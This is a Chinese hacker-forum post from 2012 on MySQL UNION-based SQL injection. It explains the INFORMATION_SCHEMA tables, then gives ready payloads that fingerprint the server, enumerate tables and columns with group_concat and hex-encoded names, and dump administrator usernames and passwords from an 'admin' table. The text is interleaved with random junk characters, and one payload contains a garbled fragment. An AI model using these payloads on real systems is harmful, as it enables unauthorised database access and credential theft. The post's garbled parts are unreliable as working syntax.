找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1937|回复: 0
打印 上一主题 下一主题

mysql常规注入

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:48:44 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
本文介绍MYSQL盲注的一些语句和方法* D+ r9 i) U! V# B$ v+ p' ?

. _( K- c5 p" W! H) i学习盲注前先了解下 IFORMATION_SCHEMA 库
; B8 g) W( p+ b4 I0 e+ G0 z; S4 |+ L+ B
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有2 \/ J* W: D+ b+ P  O) s
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。8 I. \3 g# n4 w& j
1.得到所有数据库名:1 a+ }3 _9 x" l. Y- y& Y
|SCHEMATA ->存储数据库名的表
4 B7 z) U! ?7 Q" H; F2 C  b|---字段:SCHEMA_NAME ->数据库名称
* D. X( @1 l  y3 E" ?7 ^$ u3 I8 Q" E! D' B4 x" _3 i
|TABLES ->存储表名
; p9 D& c% @+ E3 y9 \# L( ^# k& l|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名; a% V0 H' i* E, `0 v3 c
|---字段:TABLE_NAME ->存储表的表名
5 O1 ^$ P# E: I. N2 z7 _! X+ c' v/ i" ~. w
|COLUMNS ->存储的字段名表/ U. a8 }- d" F$ n* O; h
|---字段:TABLE_SCHEMA ->该字段所属数据库名, h( j, h/ H) q2 y; S, v% ^
|---字段:TABLE_NAME ->存储所属表的名称- N0 b. v: j2 g& U# O
3 P# Q4 E7 k4 f# C  n# F4 ^8 R6 Y+ s- C
|---字段:COLUMN_NAME ->该字段的名称$ Q4 T- B, i+ Z  u' l( {5 P8 i
; n& y  D' n/ a7 {

3 l3 `/ Y2 G9 f7 c
3 \: f# h& s; G###########################################################################) M8 c3 B4 R/ W, {3 t+ B" R$ Q# o
) o1 K) c- }: C0 p7 Z
0x001 获取系统信息:8 H% V' w% H4 s. Q
9 @0 d  B' O. D, T) _: P
union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
% j! x9 R& P) w7 M9 ?) C  L& D7 |9 `4 U! z& D# h
/*
$ r4 H0 |6 q* w! A+ A. U6 L/ s; b$ R* X/ p$ R/ d* t. D- l
@@global.version_compile_os 获取系统版本
3 b9 V# S4 ~: ^; a2 v6 N
. S2 S: R. c! d1 v: b1 p@@datadir 数据库路径
3 C- q% Q- M" [database() 当前数据库名称0 U8 v+ @0 G& p) @
0x3c62723e 换行HEX值4 o8 o5 y% j1 D  L- U

- Q7 Z4 K: x- ?+ R*/. Q" U1 V/ [/ T) `

1 V( t% k# {( G+ ^5 z  K
& }$ M* t5 g3 J
2 m" A) w1 e0 `6 C) S1 f######################################################################
' M% f  k  W6 F% m! {0 Q" ~
. Y. o  ]" r& T5 s$ p0x002 获取表名! a6 n6 v) H6 T* `' o, O0 U5 w0 b

! h; e+ J- W) r) dunion select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*5 B5 |2 v& i, \( W8 o7 T4 I: P
  C( i+ J- r2 A' x7 k; u& w5 r5 M  V
: n3 a5 k  Q/ x- T6 `. ^

; y2 w) a' _0 r3 U/*
0 v' ^1 v5 r& A8 _2 }
+ ?% [, k3 o; r8 C0x67617264656e 为当前数据库名1 z4 b1 n! A" G0 T- w" @
$ f- }" ]. h$ n6 R+ L; g
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名. _( R9 z$ }$ o( C

' C; @3 S, ]. x. ?" d$ l*/* G, L+ t: g% ~$ x+ g; q7 _2 W5 A

* Y' c- y- @6 e; v######################################################################, Z7 N# ]+ L# t+ y" z
; C& d1 `) y# M: E; Y5 V! w. Z

# @5 E, ?# B! ~7 W2 n. ]3 p% C( w  U( \$ J: ^: o# b
0x003 获取字段3 A1 Y. F% f) M% [) ?3 `- f" f

7 u$ f, a( q6 qunion select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*
5 |$ k, G' V+ w! J4 M5 z: U8 R( h4 U( D8 X" C6 g3 q+ O4 i. e
/*
! ~, G5 C. u9 K, ~
1 ?- m. y( l! j! k5 O, u2 Ugroup_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段( y) e: @6 s$ K6 @9 r/ G, g  y- J

2 |1 G' E+ r) t# R  P4 b+ i0x61646d696e ->选择一个表7 z) S$ l7 o( D8 n+ J& F' s  ~
: X' Y/ }& Z7 ~5 c  a
0x67617264656e ->数据库名
% C3 `/ X8 P- W1 m
! _" ^; n4 Y+ F7 |/ g$ g+ T8 {! c*/* L; D8 C6 C- v& u2 f( `3 u0 F
4 F' I2 G& v& V& ^) X
#####################################################################
1 j$ q+ c" ~( Y6 p0 K# D7 r
7 S4 P5 }" b2 U. K8 p0 G
! y, ?1 c+ L( }2 ~  {
8 ~2 @6 F, ~7 a* T2 I: g0x004 获取数据
/ X$ A1 t/ ]. L/ ^, K! `! l9 k/ `4 U5 ^; }* I9 S
union select 1,2,3
0 J/ O; ~" O6 g! O,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
$ R1 g" s. Q4 n! S8 T: m
' a: r; |; y1 E% D- k3 y( Cunion select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin
3 f* h9 z- C% B) A* ~1 i, A
( v" T3 ~$ e  Y$ o' J0 c  Q
1 E7 _# b# J  Q$ h8 @* U- t
% P3 P; @1 T9 M* C" X/*2 |" V' s; s  V, c. i+ [

% q8 p" ]. ?/ H6 C! x, {0x3c62723e 换行符号HEX编码
* D! G) \" q9 f* Z: d  i
$ Z5 r& l  g6 egroup_concat 同时获得该字段所有数据
) N0 ]2 a' W$ g7 s2 ^
- s; h: i' a0 E) F! x8 n% ?) t/ x*/9 m9 J; x0 V5 |  n

% n6 [: K* F" V: p" j& R0 T+ I  x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表